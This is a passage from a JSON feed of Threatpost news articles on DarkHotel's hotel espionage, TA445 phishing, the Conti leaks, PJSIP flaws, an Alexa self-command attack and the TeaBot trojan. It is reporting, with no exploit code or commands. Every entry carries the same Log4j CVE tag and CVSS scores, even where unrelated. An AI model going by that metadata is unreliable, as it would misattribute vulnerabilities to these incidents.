MGTO.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/18144945/darkhotel-attack-flow-chart.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/18144945/darkhotel-attack-flow-chart.png>)\n\nThe DarkHotel attack flow. Source: Trellix.\n\nTrellix was able to attribute the attacks to DarkHotel with a \u201cmoderate\u201d level of confidence due to the IP address for the command-and-control server (C2), which was previously attached to the group; the targeting of hotels, which DarkHotel is already infamous for; and patterns found in the C2 setup which match known DarkHotel activities, the report said.\n\n\u201cHowever, we have lowered our confidence level to moderate because the specific IP address remained active for quite some time even after being publicly exposed, and the same IP address is the origin of other malicious content not related to this specific threat,\u201d the Trellix team said. \u201cThese two observations have made us more cautious in our attribution.\u201d\n\n## **DarkHotel Suspected of Stealing Data for Future Attacks **\n\nOnce opened, the macros contacted the C2 server to begin data exfiltration from the hotel networks, the Trellix team explained.\n\n\u201cThe command-and-control server, hxxps://fsm-gov(.)com, used to spread this campaign was trying to impersonate a legitimate government website domain for the Federated States of Micronesia,\u201d Trellix\u2019s report added. \u201cHowever, the real Micronesia website domain is \u2018fsmgov.org.'\u201d\n\nThe Trellix team said they suspected the attackers were collecting data to be used later.\n\n\u201cAfter researching the event agenda for the targeted hotels, we did indeed find multiple conferences that would have been of interest to the threat actor,\u201d the Trellix researchers reported. \u201cFor instance, one hotel was hosting an International Environment Forum and an International Trade & Investment Fair, both of which would attract potential espionage targets.\u201d\n\nThe spear-phishing campaign stopped on Jan. 18, the team said.\n\n## **COVID-19 Stalls Campaign **\n\nThat said, the COVID-19 pandemic cancelled or delayed these events, giving law enforcement time to catch on. By Dec. 2021, the Macao Security Force Bureau received a notification from the Cyber Security Incident Alert and Emergency Response Center of the police department that a domain similar to the official Security Force page was being used to spread malware and \u201ccommit illegal acts.\u201d\n\nBesides targeting hotels, other campaigns attributed to the same C2 IP address, believed to be controlled by DarkHotel, included going after MetaMask crypto users with a spoofed Collab.Land phishing page, the Trellix report added.\n\nDarkHotel has a long history of targeting Chinese victims. In April 2020, the APT group went after Chinese virtual private network (VPN) service provider SangFor, used by several Chinese government agencies. By the end of the first week of that month, at least 200 endpoints had been compromised, according to reports.\n\nAround the same time, at the start of the COVID-19 pandemic, [DarkHotel targeted the systems of the World Health Organization](<https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/>).\n\nAttacks like these show how attractive data stored in hotel networks can be for threat actors. Hotel operators should recognize that cybersecurity needs to reach beyond their networks\u2019 edge, the Trellix team advised. Travelers likewise need to take appropriate security precautions, Trellix added.\n\n\u201cOnly bring the essential devices with limited data, keep security systems up to date and make use of a VPN service when using hotel Wi-Fi,\u201d the report said.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T18:53:40", "type": "threatpost", "title": "DarkHotel APT Targets Wynn, Macao Hotels to Rip Off Guest Data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T18:53:40", "id": "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "href": "https://threatpost.com/darkhotel-apt-wynn-macao-hotels/178989/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-03T17:21:25", "description": "Cyberattackers used a compromised Ukrainian military email address to phish EU government employees who\u2019ve been involved in managing the logistics of refugees fleeing Ukraine, according to a new [report](<https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails>).\n\nUkraine has been at the center of an unprecedented wave of cyberattacks in recent weeks and months, from distributed denial-of-service (DDoS) [campaigns](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) against organizations and citizens to attacks against national [infrastructure](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) and more. This time, attackers went after aides in the EU, leveraging breaking news in the Russian invasion of Ukraine to entice targets into opening emails containing Microsoft Excel files laced with malware.\n\nResearchers attributed the phishing attempt to TA445 (aka UNC1151 or Ghostwriter). TA445 has previously been [linked](<https://www.mandiant.com/resources/unc1151-linked-to-belarus-government>) with the government of Belarus.\n\n## Attack Coincided with Russia\u2019s Invasion\n\nOn Wednesday, Feb. 23, NATO convened an [emergency meeting](<https://www.nato.int/cps/en/natohq/news_192406.htm>) regarding the impending Russian invasion of Ukraine.\n\nThe following day \u2013 the day Russia invaded Ukraine \u2013 researchers detected a suspicious email making the rounds. Its subject: \u201cIN ACCORDANCE WITH THE DECISION OF THE EMERGENCY MEETING OF THE SECURITY COUNCIL OF UKRAINE DATED 24.02.2022.\u201d It contained a macros-enabled Microsoft Excel (.xls) spreadsheet titled \u201clist of persons.xlsx\u201d that, when opened, delivered malware called SunSeed.\n\nThe email originated from a ukr.net address, which is a Ukrainian military email address. Oddly enough, the researchers were able to trace the address to a publicly available procurement document for a Stihl-brand lawn mower, purchased back in 2016. The order was made by \u201c\u0412\u0456\u0439\u0441\u044c\u043a\u043e\u0432\u0430 \u0447\u0430\u0441\u0442\u0438\u043d\u0430 \u04102622,\u201d a military unit based in Chernihiv, Ukraine. Exactly how the attackers obtained access to a military email address is not clear.\n\nThis phishing targeted a very specific group of European government personnel involved in managing the outflux of refugees from Ukraine. Though the targets \u201cpossessed a range of expertise and professional responsibilities,\u201d the report noted, \u201cthere was a clear preference for targeting individuals with responsibilities related to transportation, financial and budget allocation, administration, and population movement within Europe.\u201d\n\nThe goal in targeting these specific individuals was \u201cto gain intelligence regarding the logistics surrounding the movement of funds, supplies, and people within NATO member countries,\u201d according to the report.\n\n## Attackers Tied to Belarus, Russia by Extension\n\nThe report noted that no \u201cconcrete\u201d evidence can \u201cdefinitively\u201d tie this campaign to a particular threat actor. Still, the researchers noted a bevy of similarities between this phishing campaign and another campaign from July of last year that targeted U.S. cybersecurity and defense companies.\n\nThe July campaign \u201cutilized a highly similar macro-laden XLS attachment to deliver MSI packages that install a Lua malware script,\u201d according to Proofpoint researchers. Lua is the programming language in which SunSeed is coded. \u201cSimilarly, the campaign utilized a very recent government report as the basis of the social engineering content,\u201d they added.\n\nThe file name in that campaign \u2013 \u201clist of participants of the briefing.xls.\u201d \u2013 bears striking resemblance to the one used in this new campaign. Furthermore, \u201cthe Lua script created a nearly identical URI beacon to the SunSeed sample, which was composed of the infected victim\u2019s C Drive partition serial number. Analysis of the cryptography calls in both samples revealed that the same version of WiX 3.11.0.1528 had been utilized to create the MSI packages.\u201d\n\nThese overlaps allowed the researchers to conclude with moderate confidence that the two campaigns were perpetrated by the same threat actor: TA445. [According](<https://www.mandiant.com/resources/unc1151-linked-to-belarus-government>) to Mandiant, the group is based in Minsk, connected to the Belarusian military, and conducts its business in the interests of the Belarusian government. Belarus is a close ally of Russia.\n\nThe researchers concluded with a disclaimer. On balancing \u201cresponsible reporting with the quickest possible disclosure of actionable intelligence,\u201d they wrote, \u201cthe onset of hybrid conflict, including within the cyber domain, has accelerated the pace of operations and reduced the amount of time that defenders have to answer deeper questions around attribution and historical correlation to known nation-state operators.\u201d\n\n## Ukraine\u2019s Unprecedented Cyber Targeting\n\nThis phishing campaign isn\u2019t the worst Ukraine-oriented cyberattack in recent weeks, or even recent days. Still, the researchers noted that \u201cwhile the utilized techniques in this campaign are not groundbreaking individually, if deployed collectively, and during a high tempo conflict, they possess the capability to be quite effective.\u201d\n\nThomas Stoesser, of comforte AG, told Threatpost via email that this attack \u201cshows just how ruthless and clever threat actors can be in adapting existing social engineering tactics.\u201d\n\n\u201cThe situation underscores two key points that every enterprise should heed,\u201d he added. \u201cOne, it\u2019s not enough simply to educate employees sporadically about common social engineering tactics. [Companies] need to put a premium on employees treating every email with healthy skepticism. Two, protect all sensitive enterprise data with more than just perimeter security, even if you feel that the impenetrable vault you\u2019ve stored it all in is foolproof.\u201d\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n![](https://slack-imgs.com/?c=1&o1=ro&url=https%3A%2F%2Fmedia.threatpost.com%2Fwp-content%2Fuploads%2Fsites%2F103%2F2022%2F02%2F25090838%2FLog4J.jpg)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T17:18:44", "type": "threatpost", "title": "Phishing Campaign Targeted Those Aiding Ukraine Refugees", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T17:18:44", "id": "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "href": "https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T19:32:09", "description": "Thanks to gray-hat Ukrainian hacker ContiLeaks, the Conti ransomware gang [spilled its guts](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) in late February. Since then, researchers have been poring over the group\u2019s secrets, including a massive trove of chat logs and other doxxed data, including [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti ransomware, TrickBot[ malware](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>), a decryptor and the gang\u2019s administrative panels.\n\nContiLeaks published these internal documents after the ransomware group\u2019s leaders posted an aggressively pro-Russian message on their official site in the aftermath of Russia\u2019s invasion of Ukraine.\n\nLast week, BreachQuest published the [findings](<https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/>) of its week-long deep dive into the data. In essence, BreachQuest found that Conti Group operates like a legitimate, above-board high-tech company that hires and even fires contractors and salaried employees alike.\n\nThe dump enabled researchers to sketch out a chart showing key figureheads and the roles they play to grow Conti\u2019s enterprise, plus details on:\n\n * Earnings and costs;\n * How they recruit;\n * Who are the leaders;\n * Who they target: small as well as big targets;\n * How they target and escalate attacks and how they receive payments;\n * How they find their victims;\n * Project Blockchain \u2013 Conti group\u2019s effort to create its own altcoin; and\n * A more thorough understanding of the tools used to spy on and compromise victims.\n\nMarco Figueroa, head of product at BreachQuest, dropped in on the Threatpost podcast to give us some of the intelligence gleaned from the leaked chat logs. Those logs show that over the course of 13 months, Conti spent about $6M on salary, monthly bonuses, tooling and services.\n\n![specops logo](https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/16111526/Specops-Logo.png)\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nIts HR team is indicative of how professionally Conti group conducts business: They offer \u201cemployee of the month\u201d and performance review programs, for example.\n\nIn short, Conti group considers itself a legitimate company. Many of its employees don\u2019t even know they\u2019re working for a cybercriminal outfit. Some probably choose to look the other way, but the turnover is still high: When they figure it out, they tend to vamoose.\n\nThat\u2019s probably one reason why Conti\u2019s training materials are the best Marco\u2019s ever seen: The group needs to document procedures because they constantly have to train new contractors.\n\nIn fact, security teams themselves should take the training, Marco says, to find out how the ransomware outfit successfully trains its regrettably top-notch cyberattackers.\n\nBy the way, after BreachQuest\u2019s report was published, Marco got a phone call from Russia: a first for him, he said. Either Conti\u2019s a fan of BreachQuest\u2019s research, it was a wrong number, or hey, who knows? Maybe its HR team is expanding its outreach.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/14174903/Russia_calling_Marco-e1647294557940.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/14174903/Russia_calling_Marco-e1647294557940.jpg>)\n\nMarco got a call from Russia. He didn\u2019t answer. Source: Threatpost screen capture.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/031122_Marco_Figueroa_BreachQuest_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s[ podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-14T21:50:45", "type": "threatpost", "title": "Staff Think Conti Group Is a Legit Employer \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T21:50:45", "id": "THREATPOST:BA0FA5036C385C822C787514850A67E5", "href": "https://threatpost.com/staff-think-conti-group-legit-employer-podcast/178903/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T21:49:53", "description": "[WhatsApp](<https://threatpost.com/facebooks-mandatory-data-sharing-whatsapp-ire/162828/>) and [BlueJeans](<https://www.bluejeans.com/>) are just two of the world\u2019s most popular communication apps that are using an open-source library riddled with newfound security holes.\n\nOne thing this open-source, flawed library shares with the Apache Log4J logging library [fiasco](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) that started in December: It\u2019s ubiquitous.\n\nThe library, [PJSIP](<https://github.com/pjsip/pjproject>) \u2013 an open-source multimedia communication library \u2013 is also used by[ Asterisk](<https://www.asterisk.org/>). Asterisk is an enterprise-class, open-source PBX (private branch exchange) [toolkit](<https://threatpost.com/voip-espionage-campaign-utilities-supplier/148916/>) that\u2019s used in voice-over-IP (VoIP) services in a massive number of implementations.\n\nAccording to the Asterisk site, the software is downloaded 2M times annually and runs on 1M servers in 170 countries. Asterisk powers IP PBX systems, VoIP gateways and conference servers, and it\u2019s used by SMBs, enterprises, call centers, carriers and governments.\n\nOn Monday, devops platform provider JFrog Security [disclosed](<https://jfrog.com/blog/jfrog-discloses-5-memory-corruption-vulnerabilities-in-pjsip-a-popular-multimedia-library/>) five memory-corruption vulnerabilities in PJSIP, which supplies an API that can be used by [IP telephony applications](<https://trac.pjsip.org/repos/wiki/Projects_Using_PJSIP>) such as voice-over-IP (VoIP) phones and conference apps.\n\nAn attacker who successfully triggers the vulnerabilities can flip the switch on remote code execution (RCE) in an application that uses the PJSIP library, JFrog researchers explained.\n\nFollowing JFrog\u2019s disclosure, PJSIP\u2019s maintainers have fixed the five CVEs, depicted below.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/01155749/PJSIP-security-vulnerabilities-e1646168517426.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/01155749/PJSIP-security-vulnerabilities-e1646168517426.png>)\n\nThe disclosed PJSIP security vulnerabilities. Source: JFrog Security.\n\n## What Went Wrong\n\nIn its technical breakdown, JFrog researchers explained that the PJSIP framework offers a library named PJSUA that supplies an API for SIP applications.\n\n\u201cThe basic PJSUA APIs are also wrapped by object-oriented APIs. PJSUA offers a rich Media Manipulation API, where we have spotted the [five] vulnerabilities,\u201d they said.\n\nThree of the flaws are stack overflow vulnerabilities that can lead to RCE and which are rated 8.1 on the CVSS severity-rating scale.\n\nThe remaining two include a read out-of-bounds vulnerability and a buffer overflow weakness in the PJSUA API, both of which can lead to denial-of-service (DoS) and both of which are rated at CVSS 5.9.\n\n## Vulnerable Projects\n\nJFrog said that projects that use the PJSIP library before version 2.12 and which pass attacker-controlled arguments to any of the following APIs are vulnerable:\n\n * pjsua_player_create \u2013 filename argument must be attacker-controlled\n * pjsua_recorder_create \u2013 filename argument must be attacker-controlled\n * pjsua_playlist_create \u2013 file_names argument must be (partially) attacker-controlled\n * pjsua_call_dump \u2013 buffer argument capacity must be smaller than 128 bytes\n\nJFrog recommended upgrading PJSIP to version 2.12 to address the vulnerabilities.\n\n## Not the First Time\n\nPockmarks in PJSIP and other common videoconferencing architecture implementations are nothing new. In August 2018, Google Project Zero researcher Natalie Silvanovich [disclosed](<https://googleprojectzero.blogspot.com/2018/12/adventures-in-video-conferencing-part-1.html>) critical vulnerabilities in most of the common ones, including WebRTC (used by Chrome, Safari, Firefox, Facebook Messenger, Signal and others), PJSIP (which, again, is used by WhatsApp, BlueJeans and millions of implementations of Asterisk) and Apple\u2019s proprietary library for FaceTime.\n\n\u201cIf exploited, such vulnerabilities would have let attackers crash apps using the implementation, by merely placing a video call,\u201d noted Ronen Slavin, then head of research at Reason Cybersecurity and currently the co-founder and CTO at the source code control, detection, and response platform Cycode, back in 2019. \u201cThis would have then triggered a memory heap overflow which could allow the attacker to take over the victim\u2019s video calling account.\u201d\n\nApps such as Skype, Google Hangouts and WhatsApp \u201chave made it easy to have meaningful face-to-face interactions across between two points anywhere on the globe,\u201d he [wrote](<https://www.infosecurity-magazine.com/opinions/hacking-video-conferencing/>).\n\nIt was true then. But since, the pandemic has been gas on the fire when it comes to virtual connections: all the more reason to heed JFrog\u2019s advice and patch ASAP.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T21:44:32", "type": "threatpost", "title": "RCE Bugs in WhatsApp, Other Hugely Popular VoIP Apps: Patch Now!", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-01T21:44:32", "id": "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "href": "https://threatpost.com/rce-bugs-whatsapp-popular-voip-apps-patch-now/178719/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-08T18:32:41", "description": "UPDATE\n\nResearchers from the University of London and the University of Catania have discovered how to weaponize Amazon Echo devices to hack themselves.\n\nThe \u2013 dubbed \u201cAlexa vs. Alexa\u201d \u2013 leverages what the researchers called \u201ca command self-issue vulnerability\u201d: using pre-recorded messages which, when played over a 3rd\u2013 or 4th-generation Echo speaker, causes the speaker to perform actions on itself.\n\n## How to Make Alexa Hack Itself\n\nSmart speakers lay dormant during the day, waiting for a user to vocalize a particular activation phrase: i.e., \u201cHey, Google,\u201d \u201cHey, Cortana\u201d or, for the Amazon Echo, \u201cAlexa,\u201d or simply, \u201cEcho.\u201d Usually, of course, it\u2019s the device\u2019s owner who issues such commands.\n\nHowever, researchers found that \u201cself-activation of the Echo device [also] happens when an audio file reproduced by the device itself contains a voice command.\u201d And even if the device asks for a secondary confirmation, in order to perform a particular action, \u201cthe adversary only has to always append a \u2018yes\u2019 approximately six seconds after the request to be sure that the command will be successful.\u201d\n\nTo get the device to play a maliciously crafted recording, an attacker would need a smartphone or laptop in Bluetooth-pairing range. Unlike internet-based attacks, this scenario requires proximity to the target device. This physical impediment is balanced by the fact that, as the researchers noted, \u201conce paired, the Bluetooth device can connect and disconnect from Echo without any need to perform the pairing process again. Therefore, the actual attack may happen several days after the pairing.\u201d\n\nAlternatively, the report stated, attackers could use an internet radio station, beaming to the target Echo like a command-and-control server. This method \u201cworks remotely and can be used to control multiple devices at once,\u201d but would required extra steps, including tricking the targeted user into downloading a malicious [Alexa \u201cskill\u201d](<https://threatpost.com/researchers-hacked-amazons-alexa-to-spy-on-users-again/131401/>) (app) to an Amazon device.\n\nUsing the Alexa vs. Alexa attack, attackers could tamper with applications downloaded to the device, make phone calls, place orders on Amazon, eavesdrop on users, control other connected appliances in a user\u2019s home and more.\n\n\u201cThis action can undermine physical safety of the user,\u201d the report stated, \u201cfor example, when turning off the lights during the evening or at nighttime, turning on a smart microwave oven, setting the heating at a very high temperature or even unlocking the smart lock for the front door.\u201d\n\nIn testing their attack, the authors were able to remotely turn off the lights in one of their own homes 93 percent of the time.\n\n## Smart Speakers Are Uniquely Vulnerable\n\nBecause they\u2019re always listening for their wake word, and because they\u2019re so often interconnected with other devices, smart speakers are prone to unique security vulnerabilities. The Echo series of devices, in particular, has been linked with a series of privacy risks, from microphones \u201c[hearing](<https://threatpost.com/hey-alexa-who-messaging/162587/>)\u201d what people text on nearby smartphones to audio recordings being stored [indefinitely](<https://threatpost.com/amazon-admits-alexa-voice-recordings-saved-indefinitely/146225/>) on company servers.\n\nThe physical proximity required for Bluetooth, or having to trick users into downloading malicious skills, limits but does not eliminate the potential for harm in such a scenario as the Alexa vs. Alexa report described, according to John Bambenek, principal threat hunter at Netenrich. Those living in dense cities are potentially at risk, and individuals \u201cat most risk are those in domestic violence scenarios,\u201d he wrote, via email. For that reason, \u201csimply accepting the risk isn\u2019t acceptable.\u201d\n\nThe research prompted Amazon to patch the command self-issue vulnerability, which is the benefit of having a robust threat-hunting culture.\n\n\u201cMost people aren\u2019t evil,\u201d wrote Bambenek. \u201cIt is hard to test new technology against criminal intent because even testers lack the criminal mindset (and that\u2019s a good thing for society). As technology gets adopted, we find things we overlook and make it better.\u201d\n\nFor its part, Amazon gave Threatpost the following statement:\n\n_\u201cAt Amazon, privacy and security are foundational to how we design and deliver every device, feature, and experience. We appreciate the work of independent security researchers who help bring potential issues to our attention, and are committed to working with them to secure our devices. We fixed the remote self-wake issue with Alexa Skills caused by extended periods of silence resulting from break tags as demonstrated by the researchers. We also have systems in place to continually monitor live skills for potentially malicious behavior, including silent re-prompts. Any offending skills we identify are blocked during certification or quickly deactivated, and we are constantly improving these mechanisms to further protect our customers.\u201d_\n\nThe latest, patched version of Alexa device software can be found [here](<https://www.amazon.com/gp/help/customer/display.html?nodeId=GMB5FVUB6REAVTXY&linkCode=sl2&tag=hothard-20&linkId=070200dafa741d26cbd19cf21d735449&language=en_US&ref_=as_li_ss_tl>).\n\n_This posting was updated on March 8 at 1:30 p.m. ET to include Amazon\u2019s statement. _\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T21:30:12", "type": "threatpost", "title": "Novel Attack Turns Amazon Devices Against Themselves", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T21:30:12", "id": "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "href": "https://threatpost.com/attack-amazon-devices-against-themselves/178797/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-02T22:50:57", "description": "The TeaBot banking trojan \u2013 also known as \u201cAnatsa\u201d \u2013 has been spotted on the Google Play store, researchers from Cleafy have [discovered](<https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe>).\n\nThe malware \u2013 designed to intercept SMS messages and login credentials from unwitting users \u2013 affected users of \u201cmore than 400 banking and financial apps, including those from Russia, China, and the U.S,\u201d its report claims.\n\nThis isn\u2019t the first time TeaBot has terrorized Android users.\n\n## TeaBot Just Won\u2019t Die\n\nTeaBot was first [discovered](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>) last year. It\u2019s a relatively straightforward malware designed to siphon banking, contact, SMS and other types of private data from infected devices. What makes it unique \u2013 what gives it such staying power \u2013 is the clever means by which it spreads.\n\nTeaBot requires no malicious email or text message, no fraudulent website or third-party service. Instead, it typically comes packaged in a dropper application. Droppers are programs that seem legitimate from the outside, but in fact act as vehicles to deliver a second-stage malicious payload.\n\nTeaBot droppers have masked themselves as ordinary QR code or PDF readers. Hank Schless, senior manager of security solutions at Lookout, explained via email that attackers \u201cusually stick to utility apps like QR code scanners, flashlights, photo filters, or PDF scanners because these are apps that people download out of necessity and likely won\u2019t put as much time into looking at reviews that might impact their decision to download.\u201d\n\nThis tactic appears to be effective. In January, an app called QR Code Reader \u2013 Scanner App [was distributing](<https://threatpost.com/fbi-malicious-qr-codes/177902/>) 17 different Teabot variants for a little over a month. It managed to pull in more than 100,000 downloads by the time it was discovered.\n\nOther TeaBot droppers \u2013 [discovered](<https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html>) by Dutch security firm ThreatFabric last November \u2013 have been packaged under many names, such as QR Scanner 2021, PDF Document Scanner and CryptoTracker. The latest, [according](<https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe>) to security firm Cleafy, was QR Code & Barcode \u2013 